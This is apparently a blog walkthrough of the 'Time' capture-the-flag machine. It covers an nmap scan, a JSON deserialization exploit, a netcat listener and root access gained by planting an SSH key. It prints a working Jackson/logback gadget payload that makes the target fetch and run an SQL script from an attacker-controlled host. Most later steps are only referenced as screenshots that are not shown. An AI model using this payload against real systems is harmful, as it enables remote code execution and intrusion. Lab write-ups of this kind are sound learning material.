In this post, i would like to share a walkthrough of the TIME Machine.

This room has been considered difficulty rated as a MEDIUM machine

Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

Information Gathering on the Time machine

Let’s open the browser and straight into the website interface.

We will be directed to the Online JSON interface and let’s do a test on the website by typing anything with the status of Validate(beta!)

Let’s do some research on the errors that appears above

After some research on the internet, I found a script that can be used for exploitation on the website.

The code that we can use for the exploitation looks like below:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://<attacker's ip>:8080/<filename>.sql'"}]"

Exploiting the application with JSON code

Before we can click the Process, we can create a new file <filename>.sql

The code that will be used can be seen as shown below:

Let’s start our nc listener on other terminal

As usual, you will need to access/home/pericles and you will find user.txt stored inside there.

Next, let’s go and retrieve the root flag!

Escalate to Root Privileges Access on Time Machine

We need to create an ssh public and private key to access the machine via ssh service

You will need to copy your id_rsa code and paste it on the target’s machine with an extra command been use here.

The screenshot above shows the actual code that will paste on your target’s machine

The screenshot above shows the target’s machine

In the screenshot above, the file is one that we just modify to access the SSH service.

We should be getting the root access after a while

We can read the root flag by typing the “cat root.txt” command


Happy Learning Guys!